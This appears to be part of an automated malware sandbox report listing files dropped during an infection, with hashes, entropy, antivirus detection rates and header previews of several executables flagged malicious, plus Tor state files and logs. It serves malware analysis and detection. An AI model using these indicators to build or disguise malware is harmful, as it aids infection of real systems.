                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60768
                                                                                                                                                                    Entropy (8bit):2.029708754995087
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:vmW2CAn13Km8hhOzc+W4s6N41/acSj6U52/Mk17:6zn13lJzxs6N4acSj6o27
                                                                                                                                                                    MD5:7702DAD7C502F566280C396D98AFEDC0
                                                                                                                                                                    SHA1:E30DD5CCB9EA957CF0A58731D3D1AE7C509D920B
                                                                                                                                                                    SHA-256:CD99601177264C9A14C17C57C2DC0705B46D8396C98831ACFA78D49B681629EF
                                                                                                                                                                    SHA-512:5B6FBF9DB168002B0C587D464733CCCA94DE30762B6F0429AAC573B2C2E708263A451F24ADFB599084A0AE7B4E0859479FA2B9145F9C3D45F70A45D9BB21269E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... ........(.e.........................................%..........T.......8...........T...............P...........\...........H...............................................................................eJ..............GenuineIntel............T.......P....(.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8352
                                                                                                                                                                    Entropy (8bit):3.6912231495971093
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJp996a+g6Y9FSUp1lGGgmflIprX89bUmsfc8m:R6lXJpn6a56YvSUp1VgmfltUFfe
                                                                                                                                                                    MD5:03DE6777F3AA9C9AF3D6077F284E2C96
                                                                                                                                                                    SHA1:9A0CE70DB2487D133887810213BAE0395A92F01B
                                                                                                                                                                    SHA-256:5C40283EF4F041BC883A6D9C18B17A328A8BA02FFD447FD62A8128310EE4E8B8
                                                                                                                                                                    SHA-512:D993AFE9841D2B3B86A4E82863D38D7A83AA51996D4BBD4052F91DCE18C6C41CB99BFF4067797FAD196A2358A3F4AF644F51BD60117015D65A8986166E348134
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.8.<./.P.i.
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\E35F.exe
                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1498
                                                                                                                                                                    Entropy (8bit):5.364175471524945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIs0E4KCKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oa1qHGIs0HKCtHTHhAu
                                                                                                                                                                    MD5:4498136F7C115EAA76D9BDA4497E42DE
                                                                                                                                                                    SHA1:D490DC922B978B5657BFB5D611285343C27B2403
                                                                                                                                                                    SHA-256:51FB932FFE68E1134CD2B88F4AB0CFB10DC266AD910B0A3949A98F2A6E9AD197
                                                                                                                                                                    SHA-512:C28DC4E3D78FC7CB4FA976832ECF75F0A915338A87888CADECAEDB67AFE7267FB638308B8FD48E07E10724A0AE88D7AFA0492D764E842433828AD58115AAC171
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):522
                                                                                                                                                                    Entropy (8bit):5.358731107079437
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                                                                                    MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                                                                                    SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                                                                                    SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                                                                                    SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\FD8E.exe
                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                    Entropy (8bit):5.353683843266035
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1435
                                                                                                                                                                    Entropy (8bit):5.3390464553014825
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:ML9E4KiE4K5sXE4qdKtKDE4KhKiKhPKIE4oKNzKoZAE4Kze41qE4DJE4x84j:MxHKiHKMH7YHKh3oPtHo6hAHKze41qHz
                                                                                                                                                                    MD5:6B8730ABC64C7CE1CDBB0E729CE7C13D
                                                                                                                                                                    SHA1:1E0F389E7F6BCAD78AD5BFEF20851088FECD2C62
                                                                                                                                                                    SHA-256:7CB144DB94CA8A9F7FE4E4F84DDDC93636624E31C5E2BE9805C15FF3FFF9B5EC
                                                                                                                                                                    SHA-512:D745B34DF6FCF11E6BABCC700CB89FB3ABF051336F8D3BEEF7F7014D5043BC8B619B9AE0B7A59F64211CE0A39A513992F2102BFD30F25532BE421CE4637D49AC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Cultu
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1019
                                                                                                                                                                    Entropy (8bit):5.236946495216897
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                                                                                                                    MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                                                                                                                    SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                                                                                                                    SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                                                                                                                    SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4707351
                                                                                                                                                                    Entropy (8bit):7.9987320211549635
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:98304:Q4Js9EOXpbgaKwIAzQKGQk1Tr+TDNiase2vddwJjrF4dm8:B4XV5KwIgDGQoTIDVsbvdOJXF4dD
                                                                                                                                                                    MD5:AC1F652F56A5D8DA834680A729BB08C7
                                                                                                                                                                    SHA1:67D93C21D58C42874B417BC0CC4D55F8E509A28C
                                                                                                                                                                    SHA-256:DF7B3F70371116DCBDE25DD117254DE513F9ABE9CA80559498C38CFA04B6503F
                                                                                                                                                                    SHA-512:878423C0B812D012F0F79CCEF24605A4997BCDB3815E9B00663E0CA2A5EFCEE420C434A1E22EDB409DD3E6F33B5B5F57E7A0980B45451404262E85D2C789895B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 12%, Browse
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\FD8E.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4297616
                                                                                                                                                                    Entropy (8bit):7.9897950760246275
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:5uJ+mQVy+bO/gTPrVKY31RmoFg+NxoUKIhltVeal5ZCRHNOq:ATQw+DP1yebXKIPyal5oRn
                                                                                                                                                                    MD5:DDB9E283DA50BE00E70D982A8952FD9E
                                                                                                                                                                    SHA1:D547EB4133C595E7C699A6AD28EBC54DB08D062A
                                                                                                                                                                    SHA-256:ACEE0678E7B8E07828826E0C2C8244357FCE25FF63D823EB987E25CF2494A6D3
                                                                                                                                                                    SHA-512:F2EA64231E92E240FE58E9888777A370722051969E33BAF8EBBBC976E1619642E3FF95E4B0A753804D85BDB72C25EAF8E319C3EE85BE8DD9CF9D6F3399F6592A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 65%, Browse
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: n8JqyJSXnE.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: B2AUFF22T7.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...K..d..................?...C.....a.........@...@...................................B.....................................44@.d....P...D............A...............@...............................@.@.............@..............................text.....?.......?................. ..`.rdata..j-....@.......@.............@..@.data...|.B..@@......0@.............@....rsrc....d...P...F...B@.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):419840
                                                                                                                                                                    Entropy (8bit):7.120561555045735
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:PrWet83KFhsr9ADNdx/zQlpuE+7h0dDcMpgkeI76v+tus:PKz3KTDNdBQl4h7huDcqe+W+tu
                                                                                                                                                                    MD5:47FF6687383E2C84A0DDF860E8DB33EB
                                                                                                                                                                    SHA1:F2C050CEAA89782BFC1AC11408B1DD0D1C5BF850
                                                                                                                                                                    SHA-256:CEC4526595332B8CFFE6739A84914E22E2954CB92022FC25E380E0D687AB487A
                                                                                                                                                                    SHA-512:08DDCD728B3DFABD2C81E1B2314F5F79B044CB4F4E41363BE08459E5548E040763A5DE8D3F283C15C7104267EF2138BD512E1B8A035DEB243C2777CA5986E3F8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............`.....`............Tv.....Tv.....Tv.....Tv.....2w.....)u.....)u.....)u.......s........D...t.....t+.....C....t.....Rich............PE..L...u.e...............$.....Fi......X............@...........................n.....g9....@..................................F..d....pk.......................l.T....-..8...................@........-..@............................................text..._........................... ..`.rdata..Z...........................@..@.data.....h..`.......>..............@....rsrc........pk......D..............@..@.reloc..T.....l.....................@..Bfkgjuy7...... l.....................@..@........................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2158592
                                                                                                                                                                    Entropy (8bit):7.937934645895191
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:m2PuO0ctaJ+8IBAQAQjVyj4NM6fO2ruQ8nFA7bIE29hJI:m2P4hJ+hBcOyjefOiuroA
                                                                                                                                                                    MD5:5987C294CCBA44C0D7805C332132507D
                                                                                                                                                                    SHA1:F5D9AA9BF0B1623A76A043C3EB1F736256887589
                                                                                                                                                                    SHA-256:DA0E089B88A6BA2738C72CC1A001E6A14D0AAFE8BD550591E6BFFCF4D174097B
                                                                                                                                                                    SHA-512:F624EE01DCCCBA7BB53E8376B7D2A93CD542772A462A1C46780B71E7EC34FF6D15C21570E0CA06E2FF15F1AE5A28B9131D630C2E7F37420A395042EDDC7A1F5E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 63%, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............p......................p.......p.......p......Rich....................PE..L.....6...........!.....p...p ......"........................................ .....J.!.................................f............. .h..................... ..-......................................................X............................text....i.......p..................;..`hvwba..................................@.data...0~..........................@...D................ ..................@...CONST........0... ...0..............@....CRT....*$...P...0...P..............@..@.qdata..h..... .. .... .............@..@.reloc..rA.... ..P.... .............@..B........................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1278578
                                                                                                                                                                    Entropy (8bit):7.888680770548891
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:1D3s67Twbc8NIdi9SePHdvwtlTWlTnF6hcz5+ntmgTUji:RX7Tdosepwr4TnF6hYEtp
                                                                                                                                                                    MD5:1B728C6E8F10313D7367C82E48D022DA
                                                                                                                                                                    SHA1:192A6598214C1A9D19717F18E271A4360EB38B44
                                                                                                                                                                    SHA-256:16748566FC9E297FA08B4433FADEAFDD63C1527FAD4CAC0CF8DF287DF56088D1
                                                                                                                                                                    SHA-512:3BF139A04D28A6858EC8C697F3387C613844D0628AD42725D21274A3574937482DA2BC921944D34B4B7E1D91F4821E328CF2668AD768A52CB2C63C15B136D258
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                    Preview:MZ`.....................@...............................................!..L.!Require Windows..$....................c..............................................A.....A.....A......A.s........A.....Rich..........PE..L...G%.[.................B...................`....@.........................................................................L........`..<............P...1..........0...T...............................@............`...............................text....A.......B.................. ..`.rdata.......`.......F..............@..@.data....\..........................@....rsrc...<....`......................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1899520
                                                                                                                                                                    Entropy (8bit):7.983042052289404
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:iQX9+3Y1m2M/++RBu4dZxuOxYyWelVrMGROcxRvhqvETcq6+aic+eKZELRMBk:HTk29zXODWevrMItxhhqvt+k+eKZE9G
                                                                                                                                                                    MD5:AA053CF4ED948FEC79703DEBBB45FBBF
                                                                                                                                                                    SHA1:5911604358446DF9EBF3397DBB6EBF82628BA7A7
                                                                                                                                                                    SHA-256:0D7AAF278F5B8CFF257702F9FD344FA7547D9901C4EC1AE8742954E827026E90
                                                                                                                                                                    SHA-512:DFCB6EDBA8EF8EBF66316F1E68D2CE9A4CE45C6F03CDD94821673B75E075A3CCBC0767CF4CB8B3B3D4BD14DF28F8122DADF0C433F8471A0502E01BD8B66287FD
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.... .c.................:....B..............P....@..........................._..............................................s..d.....^..x...........................Q..............................hm..@............P..t............................text....9.......:.................. ..`.rdata..b,...P.......>..............@..@.data.....B..........l..............@....rsrc....x....^..z..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):209
                                                                                                                                                                    Entropy (8bit):4.778257629145952
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:SbdWwxXlI/uR7nXr87+QVe2vwR/Ep5fM83U7osbQz:bwxXWu1Xr87HVBvwNCW7Wz
                                                                                                                                                                    MD5:84548ADEFD91E1D79F3E641C726EA100
                                                                                                                                                                    SHA1:F9F37BAEE7CD9B08F864C777551A607369A9A148
                                                                                                                                                                    SHA-256:4393A2B867762C791C76B38E7BF46645399D19269902C22976F3404B724C531C
                                                                                                                                                                    SHA-512:C94DBDCBB50A74F0F49D01ACD3204F87BE25B32248197BA87EBB49DCD5A389B6F6CDEBFAC81C26534357861EAFCE469EC7DFDC053EAAB28A1CF53B7E37754F28
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# Tor state file last generated on 2024-01-07 05:29:48 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..LastWritten 2024-01-07 04:29:48..TorVersion Tor 0.4.4.9..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):209
                                                                                                                                                                    Entropy (8bit):4.778257629145952
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:SbdWwxXlI/uR7nXr87+QVe2vwR/Ep5fM83U7osbQz:bwxXWu1Xr87HVBvwNCW7Wz
                                                                                                                                                                    MD5:84548ADEFD91E1D79F3E641C726EA100
                                                                                                                                                                    SHA1:F9F37BAEE7CD9B08F864C777551A607369A9A148
                                                                                                                                                                    SHA-256:4393A2B867762C791C76B38E7BF46645399D19269902C22976F3404B724C531C
                                                                                                                                                                    SHA-512:C94DBDCBB50A74F0F49D01ACD3204F87BE25B32248197BA87EBB49DCD5A389B6F6CDEBFAC81C26534357861EAFCE469EC7DFDC053EAAB28A1CF53B7E37754F28
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# Tor state file last generated on 2024-01-07 05:29:48 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..LastWritten 2024-01-07 04:29:48..TorVersion Tor 0.4.4.9..
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):308736
                                                                                                                                                                    Entropy (8bit):6.446359605030636
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:u8lLhDkSuupj2pETuETIm61NfTgYn79o6q:u+WSuup0EzbCn7a
                                                                                                                                                                    MD5:0E219D95AC454729366F376B54D9CFB4
                                                                                                                                                                    SHA1:18D0669758DF7344248BDE48827EAA0AB6B0420D
                                                                                                                                                                    SHA-256:BA134E62CF135A967C9C08BC04D3568B3A11A8933D299ADA80506855B6680D5C
                                                                                                                                                                    SHA-512:77DA1BA45B636C8617B68E5B20B9E3F87A407CECEFFD395AA989DF8B2FF67BDE07F41FEEF61967F4C9B324A8E31D12A702E6968028B627500744ECBC35193EDD
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 46%, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(8e.lY..lY..lY..r...}Y..r...>Y..r...HY..K.p.kY..lY...Y..r...mY..r...mY..r...mY..RichlY..........PE..L....6.d.................d...z......#"............@.......................... .......`..........................................P........}..................................................H........................................................text....b.......d.................. ..`.rdata...@.......B...h..............@..@.data...|...........................@....tls.........p.......0..............@....fidox...............2..............@....zope...A............4..............@....rsrc....}.......~...8..............@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1071200
                                                                                                                                                                    Entropy (8bit):6.430438608680571
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ig3SttBw3RuXUurx5pJDrYwrxI9ABHu/MKkWMG7AaVBu:igUtEkXUu15pJDrYKxO2Hu/MKkWMdaVw
                                                                                                                                                                    MD5:BFA84DBDE0DF8F1CAD3E179BD46A6E34
                                                                                                                                                                    SHA1:06AE3C38D4B2F8125656268925EBDE9ECA6A1F9E
                                                                                                                                                                    SHA-256:6DE412B8674FFBA5D78FF9D36ABFFBE2CF86FD08B2231592FCA2FCF41F1F2314
                                                                                                                                                                    SHA-512:EDD4C839437570003E1CC4A04E6CB7BF8C70C0EBDAE741E69782E9BDF47C42441CD8D709170898859B94B3248CCCF0E9DFA5E183C110B93DED935CE69A0FF82A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
